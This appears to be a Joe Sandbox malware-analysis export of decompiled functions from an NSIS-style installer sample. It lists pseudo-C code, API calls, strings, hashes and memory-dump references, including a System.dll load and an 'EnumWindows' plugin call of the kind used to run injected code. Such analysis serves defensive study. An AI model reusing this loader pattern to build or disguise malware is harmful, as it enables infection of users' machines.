Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: f1f7e37c5f37630b72f6845fbd57869b2fc528f3cdafd86d5b2e789551c5bd10
Instruction ID: 46fd840fe6511d7ccc003e1cb9660209246fe71c7ecdf6ea51a48f4d7cc48468
Opcode Fuzzy Hash: f1f7e37c5f37630b72f6845fbd57869b2fc528f3cdafd86d5b2e789551c5bd10
Instruction Fuzzy Hash: 93F0BB7160022467DB10A764DC0DB9A36ACEB00304F50447AA906F61C2E77CDE54C79C

Uniqueness

Uniqueness Score: -1.00%

Function 00406A56 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00406A56(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				signed int _t12;
				WCHAR* _t15;
				signed int _t17;
				void* _t21;
				WCHAR* _t24;

				_t24 = _a4;
				_push("true");
				_pop(_t21);
				while(1) {
					_t21 = _t21 - 1;
					_v12 = 0x73006e;
					_v8 = 0x61;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_v8 = _v8 + _t12 % _t17;
					_t15 = GetTempFileNameW(_a8,  &_v12, 0, _t24); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t21 != 0) {
						continue;
					} else {
						 *_t24 = _t15;
					}
					L5:
					return _t15;
				}
				_t15 = _t24;
				goto L5;
			}

0x00406a5c
0x00406a60
0x00406a62
0x00406a63
0x00406a63
0x00406a64
0x00406a6b
0x00406a72
0x00406a7a
0x00406a80
0x00406a8d
0x00406a95
0x00000000
0x00000000
0x00406a99
0x00000000
0x00406a9b
0x00406a9b
0x00406a9b
0x00406aa2
0x00406aa5
0x00406aa5
0x00406aa0
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00406A72
GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CD4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76A83420,004039C2), ref: 00406A8D

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A5F
a, xrefs: 00406A6B
C:\Users\user\AppData\Local\Temp\, xrefs: 00406A5B
n, xrefs: 00406A64

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
API String ID: 1716503409-3027303449
Opcode ID: 9de58611c99d9c927524e8b5e5d4063ad7aa9c56d54475759094ed59cc3f2f7a
Instruction ID: ceede72bcc8b9f9399702d6205d38d242a1142e8e26f45c6d668c419d088e7be
Opcode Fuzzy Hash: 9de58611c99d9c927524e8b5e5d4063ad7aa9c56d54475759094ed59cc3f2f7a
Instruction Fuzzy Hash: E9F05E72700208BBEB149F55DC09BDE7779EF91B14F14803BEA41BA180E3F45E5487A4

Uniqueness

Uniqueness Score: -1.00%

Function 0040225D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 81
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E0040225D(void* __ebp, void* _a4, void* _a8, intOrPtr _a12, intOrPtr* _a16, WCHAR* _a20, void* _a28, intOrPtr _a32, signed int _a48) {
				void* _v0;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t26;
				void* _t27;
				intOrPtr* _t29;
				void* _t30;
				WCHAR* _t32;
				struct HINSTANCE__* _t33;
				void* _t37;
				void* _t39;

				_t37 = __ebp;
				_t27 = 1;
				if( *0x435a60 < __ebp) {
					_push("C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp\System.dll");
					_push(0xffffffe7);
					L16:
					E00405D3A();
					L17:
					 *0x435ac8 =  *0x435ac8 + _t27;
					return 0;
				}
				_t32 = E0040303E(_t30, "true");
				_a20 = _t32;
				_a12 = E0040303E(_t30, 1);
				if(_a48 == __ebp) {
					L4:
					_t17 = LoadLibraryExW(_t32, _t37, "true"); // executed
					_t33 = _t17;
					_t44 = _t33;
					if(_t33 == 0) {
						_push("C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp\System.dll");
						_push(0xfffffff6);
						goto L16;
					}
					L5:
					_t29 = E00406269(_t44, _t33, _a20);
					_a16 = _t29;
					if(_t29 == 0) {
						E00405D3A(0xfffffff7, _a20);
					} else {
						_t27 = _t37;
						if(_a48 == _t27) {
							 *_t29(_a32, 0x400, L"user32::EnumWindows(i r1 ,i 0)", 0x40b100, 0x40b000);
							_t39 = _t39 + 0x14;
						} else {
							E00405D3A(_a48, "C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp\System.dll");
							if(_a16() != 0) {
								_t27 = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 + 0x34)) == _t37 && E00403CD6(_t33) != 0) {
						FreeLibrary(_t33);
					}
					goto L17;
				}
				_t26 = GetModuleHandleW(_t32); // executed
				_t33 = _t26;
				if(_t33 != 0) {
					goto L5;
				}
				_t32 =  *(_t39 + 0x18);
				goto L4;
			}

0x0040225d
0x00402260
0x00402268
0x0040233e
0x00402343
0x00402345
0x00402345
0x00402ea5
0x00402ea5
0x00402eb7
0x00402eb7
0x00402275
0x00402278
0x00402281
0x00402289
0x0040229c
0x004022a0
0x004022a6
0x004022a8
0x004022aa
0x00402335
0x0040233a
0x00000000
0x0040233a
0x004022b0
0x004022ba
0x004022bc
0x004022c2
0x0040230c
0x004022c4
0x004022c4
0x004022ca
0x004022ff
0x00402301
0x004022cc
0x004022d5
0x004022e0
0x004022e2
0x004022e2
0x004022e0
0x004022ca
0x00402315
0x0040232a
0x0040232a
0x00000000
0x00402315
0x0040228c
0x00402292
0x00402296
0x00000000
0x00000000
0x00402298
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 0040228C

Part of subcall function 00405D3A: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,?,00000000,?,?), ref: 00405D6C
Part of subcall function 00405D3A: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,?,00000000,?,?), ref: 00405D7E
Part of subcall function 00405D3A: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,?), ref: 00405D99
Part of subcall function 00405D3A: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll), ref: 00405DB1
Part of subcall function 00405D3A: SendMessageW.USER32(?), ref: 00405DD8
Part of subcall function 00405D3A: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
Part of subcall function 00405D3A: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00

LoadLibraryExW.KERNELBASE(00000000,?,?,00000001,?), ref: 004022A0
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,?,00000001,?), ref: 0040232A

Strings

user32::EnumWindows(i r1 ,i 0), xrefs: 004022F4
C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll, xrefs: 004022CC, 00402335, 0040233E

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll$user32::EnumWindows(i r1 ,i 0)
API String ID: 334405425-4211612727
Opcode ID: 5d9898d65b13684158c7c887a5d08f6c9bc0d99037dba9cc0df1bb948ee2ac44
Instruction ID: aa6b704e5079027a8c34e107c1f377ebbd1d9565507d54c53cf3a7cdcd1ba86e
Opcode Fuzzy Hash: 5d9898d65b13684158c7c887a5d08f6c9bc0d99037dba9cc0df1bb948ee2ac44
Instruction Fuzzy Hash: C3210632648701ABD710AF618E8DA3F76A4ABD8721F20013FF941B12D1DBBC9801979F

Uniqueness

Uniqueness Score: -1.00%

Function 00402656 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00402656(int _a20, intOrPtr _a24, intOrPtr _a40, intOrPtr _a52, intOrPtr _a56, char _a60, intOrPtr _a72) {
				void* _v0;
				void* _v4;
				void* _v8;
				void* _t20;
				intOrPtr _t24;
				signed int _t25;
				signed int _t32;
				void* _t37;
				intOrPtr _t39;
				int _t45;
				void* _t46;
				int _t47;
				void* _t49;
				void* _t51;

				_a24 = _a56;
				_a20 = _a60;
				_a24 = E0040303E(_t37, 2);
				_t20 = E0040303E(_t37, 0x11);
				_t32 = 1;
				E004062A5(_t51, E00403023(_a72), _t20, 0x100022,  &_a60); // executed
				_t39 =  !=  ? 0 : _a40;
				_a52 = _t39;
				if(_t39 != 0) {
					_t24 = _a24;
					if(_t24 != 1) {
						_push("true");
						_pop(_t45);
						__eflags = _t24 - 1;
						if(_t24 != 1) {
							_t45 = _t47;
							__eflags = _t24 - 3;
							if(_t24 == 3) {
								_t45 = E00403148(_a52, _t47, 0x40c108, 0x1800);
							}
						} else {
							 *0x40c108 = E00403002(3);
						}
					} else {
						E0040303E(_t37, 0x23);
						_t45 = 2 + lstrlenW(0x40c108) * 2;
					}
					_t46 =  *(_t49 + 0x54);
					_t25 = RegSetValueExW(_t46,  *(_t49 + 0x2c), _t47, _a20, 0x40c108, _t45); // executed
					asm("sbb eax, eax");
					_t32 = _t32 &  ~_t25;
					RegCloseKey(_t46); // executed
				}
				 *0x435ac8 =  *0x435ac8 + _t32;
				return 0;
			}

0x0040265a
0x00402664
0x0040266f
0x00402673
0x0040268a
0x00402692
0x0040269f
0x004026a2
0x004026a8
0x004026ae
0x004026b9
0x004026d1
0x004026d3
0x004026d4
0x004026d6
0x004026e7
0x004026e9
0x004026ec
0x004026fe
0x004026fe
0x004026d8
0x004026e0
0x004026e0
0x004026bb
0x004026bd
0x004026c8
0x004026c8
0x00402701
0x00402710
0x00402718
0x0040271a
0x0040271d
0x0040271d
0x00402ea5
0x00402eb7

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb12B3.tmp,00000023,?,00000011,00000002), ref: 004026C3
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsb12B3.tmp,?,?,00000011,00000002), ref: 00402710
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsb12B3.tmp,?,?,00000011,00000002), ref: 0040271D

Strings

C:\Users\user\AppData\Local\Temp\nsb12B3.tmp, xrefs: 004026B2, 004026C2, 004026E0, 004026F3, 00402705

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp
API String ID: 2655323295-3672052564
Opcode ID: 3e07514d90428e6a88bb3508a2036233d11feb277dc401e629d577e54deb66e6
Instruction ID: b85799c5b09c0d4e5107b9a6a50aeda658419008c73e2f9c6ba38a7de01b1a8e
Opcode Fuzzy Hash: 3e07514d90428e6a88bb3508a2036233d11feb277dc401e629d577e54deb66e6
Instruction Fuzzy Hash: CF21D072608311ABD711AFA5CC85B2FBBE8EB98760F10093EF541F71C1C7B99901879A

Uniqueness

Uniqueness Score: -1.00%

Function 004068E6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004068E6(signed int _a4) {
				struct HINSTANCE__* _t6;
				signed int _t8;

				_t8 = _a4;
				_t9 =  *(0x40b030 + _t8 * 8);
				_t6 = GetModuleHandleA( *(0x40b030 + _t8 * 8));
				if(_t6 != 0) {
					L2:
					return GetProcAddress(_t6,  *(0x40b034 + _t8 * 8));
				}
				_t6 = E0040619E(_t9); // executed
				if(_t6 != 0) {
					goto L2;
				}
				return _t6;
			}

0x004068e8
0x004068ec
0x004068f4
0x004068fc
0x00406908
0x00000000
0x00406910
0x004068ff
0x00406906
0x00000000
0x00000000
0x00406918

APIs

GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403810,0000000B), ref: 004068F4
GetProcAddress.KERNEL32(00000000), ref: 00406910

Part of subcall function 0040619E: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004061B5
Part of subcall function 0040619E: wsprintfW.USER32 ref: 004061F1
Part of subcall function 0040619E: LoadLibraryExW.KERNELBASE(?,00000000,?), ref: 00406205

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004068E7
UXTHEME, xrefs: 004068E6, 004068F3, 004068FE

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
API String ID: 2547128583-890815371
Opcode ID: 08f22430275ebaf4ce71005d419f066f02b7a6b81224d03b75b5b8ff4b37f54b
Instruction ID: 085141bfa328d30a19c357711f10e0b2ef6edf17adcd8b925e9f05de384a5053
Opcode Fuzzy Hash: 08f22430275ebaf4ce71005d419f066f02b7a6b81224d03b75b5b8ff4b37f54b
Instruction Fuzzy Hash: 00D02B316012159BDB001F22AE0C94F771DEEA67907020032F501F6231E334DC21C5FC

Uniqueness

Uniqueness Score: -1.00%

Function 00405E3E Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00405E3E(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				short _t17;
				int _t21;
				long _t23;

				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_push("true");
				_pop(_t17);
				_v36.Control = _t17;
				_v36.Owner = 0x409760;
				_v36.Group = 0x409760;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Dacl = 0x409750;
				_v16.nLength = 0xc;
				_t21 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t21 != 0) {
					L3:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) == 0) {
						return GetLastError();
					}
					goto L3;
				}
				return _t23;
			}

0x00405e44
0x00405e48
0x00405e4c
0x00405e4e
0x00405e4f
0x00405e58
0x00405e5b
0x00405e61
0x00405e6b
0x00405e71
0x00405e78
0x00405e7f
0x00405e87
0x00405eac
0x00000000
0x00405eac
0x00405e89
0x00405e94
0x00405eaa
0x00000000
0x00405eb0
0x00000000
0x00405eaa
0x00405eb7

APIs

CreateDirectoryW.KERNELBASE(00000000,?), ref: 00405E7F
GetLastError.KERNEL32 ref: 00405E89
SetFileSecurityW.ADVAPI32(00000000,80000007,00000001), ref: 00405EA2
GetLastError.KERNEL32 ref: 00405EB0

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: 03bab9027c0db145622c505044cc12d7385c4ed912075bcffeefb87771bfe4ea
Instruction ID: 6ae0cafa5f15e980fc825a914f3c6ead540d2f1400f747b3271702dfe1e84024
Opcode Fuzzy Hash: 03bab9027c0db145622c505044cc12d7385c4ed912075bcffeefb87771bfe4ea
Instruction Fuzzy Hash: 3F01D675D00209EBEB009FA0D948BEFBBB9EB14315F104526E949F2291E7789A44CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00405E1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E1E(WCHAR* _a4) {
				int _t2;
				long _t5;

				_t5 = 0;
				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					_t5 = GetLastError();
				}
				return _t5;
			}

0x00405e1f
0x00405e26
0x00405e2e
0x00405e36
0x00405e36
0x00405e3b

APIs

CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CC9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76A83420,004039C2), ref: 00405E26
GetLastError.KERNEL32 ref: 00405E30

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E1E

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1375471231-3355392842
Opcode ID: 8059bd01f3cb96d00b90c150394375a165c75bb7fcfbb43778e4f95d7889324c
Instruction ID: 407710f282aa9913273e94a45afee278ff037c1c447fef60eab8b448319c413c
Opcode Fuzzy Hash: 8059bd01f3cb96d00b90c150394375a165c75bb7fcfbb43778e4f95d7889324c
Instruction Fuzzy Hash: 56C012326050309BC3201B69AD0CA87BE94EB906A13018635B989E2220D2308C008AE8

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC167A Relevance: 4.6, APIs: 3, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6ECC167A(void* __ebx, void* __edx, void* __edi, void* __esi) {
				void* _t37;
				intOrPtr _t43;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t55;
				void* _t56;
				signed char _t62;
				signed int _t64;
				signed int _t66;
				struct HINSTANCE__* _t71;
				void* _t72;
				void* _t80;
				void* _t84;
				void* _t85;
				void* _t87;

				_t80 = __esi;
				_t72 = __edi;
				_t55 = __ebx;
				 *0x6ecc5040 =  *((intOrPtr*)(_t87 + 8));
				 *0x6ecc503c =  *((intOrPtr*)(_t87 + 0x94));
				 *0x6ecc5038 =  *((intOrPtr*)(_t87 + 0x90));
				 *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x9c)) + 0xc))( *0x6ecc5014, E6ECC132B, _t84);
				_push("true");
				_t37 = E6ECC2351();
				_t85 = _t37;
				if(_t85 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t85 + 4)) != 1) {
						E6ECC1FCB(_t85);
					}
					E6ECC2049(_t85);
					if( *((intOrPtr*)(_t85 + 4)) == 0xffffffff) {
						L14:
						if(( *(_t85 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t85 + 4)) == 0) {
								_t37 = E6ECC2209(_t85);
							} else {
								_push(_t55);
								_push(_t80);
								_push(_t72);
								_push("true");
								_pop(_t64);
								_t14 = _t85 + 0x1018; // 0x1018
								_t56 = _t14;
								memcpy(_t87 + 0x14, _t56, _t64 << 2);
								_t43 = E6ECC1F1E(_t85, _t87 + 0x30);
								 *(_t85 + 0x1034) =  *(_t85 + 0x1034) & 0x00000000;
								 *((intOrPtr*)(_t85 + 0x1020)) = _t43;
								 *_t56 = 4;
								E6ECC2209(_t85);
								_push("true");
								_pop(_t66);
								_t37 = memcpy(_t56, _t87 + 0x28, _t66 << 2);
							}
						} else {
							E6ECC2209(_t85);
							_t37 = GlobalFree(E6ECC15EB(E6ECC1668(_t85)));
						}
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							E6ECC200D(_t85);
							_t62 =  *(_t85 + 0x1010);
							_t37 = _t62;
							if((_t62 & 0x00000040) != 0 &&  *_t85 == 1) {
								_t71 =  *(_t85 + 0x1008);
								if(_t71 != 0) {
									FreeLibrary(_t71);
									_t37 =  *(_t85 + 0x1010);
								}
							}
							if((_t37 & 0x00000020) != 0) {
								_t37 = E6ECC15C5( *0x6ecc502c);
							}
						}
						if(( *(_t85 + 0x1010) & 0x00000002) == 0) {
							_t37 = GlobalFree(_t85); // executed
						}
						goto L28;
					}
					_t49 =  *_t85;
					if(_t49 == 0) {
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							goto L14;
						}
						E6ECC2F9F(_t85);
						L12:
						_t85 = _t49;
						L13:
						goto L14;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						L8:
						_t49 = E6ECC2D14(_t85); // executed
						goto L12;
					}
					_t51 = _t50 - 1;
					if(_t51 == 0) {
						_push(_t85);
						E6ECC17F7();
						goto L13;
					}
					if(_t51 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x6ecc167a
0x6ecc167a
0x6ecc167a
0x6ecc1684
0x6ecc1690
0x6ecc169d
0x6ecc16b4
0x6ecc16b7
0x6ecc16b9
0x6ecc16be
0x6ecc16c3
0x6ecc17ef
0x6ecc17f6
0x6ecc16c9
0x6ecc16cd
0x6ecc16d0
0x6ecc16d5
0x6ecc16d7
0x6ecc16e1
0x6ecc1719
0x6ecc1720
0x6ecc1744
0x6ecc1792
0x6ecc1746
0x6ecc1746
0x6ecc1747
0x6ecc1748
0x6ecc1749
0x6ecc174b
0x6ecc1750
0x6ecc1750
0x6ecc175d
0x6ecc1760
0x6ecc1765
0x6ecc176d
0x6ecc1773
0x6ecc1779
0x6ecc1787
0x6ecc1789
0x6ecc178a
0x6ecc178e
0x6ecc1722
0x6ecc1723
0x6ecc1738
0x6ecc1738
0x6ecc179c
0x6ecc179f
0x6ecc17a5
0x6ecc17ab
0x6ecc17b0
0x6ecc17b8
0x6ecc17c0
0x6ecc17c3
0x6ecc17c9
0x6ecc17c9
0x6ecc17c0
0x6ecc17d1
0x6ecc17d9
0x6ecc17de
0x6ecc17d1
0x6ecc17e6
0x6ecc17e9
0x6ecc17e9
0x00000000
0x6ecc17e6
0x6ecc16e6
0x6ecc16e9
0x6ecc170e
0x00000000
0x00000000
0x6ecc1711
0x6ecc1716
0x6ecc1716
0x6ecc1718
0x00000000
0x6ecc1718
0x6ecc16eb
0x6ecc16ee
0x6ecc16fa
0x6ecc16fb
0x00000000
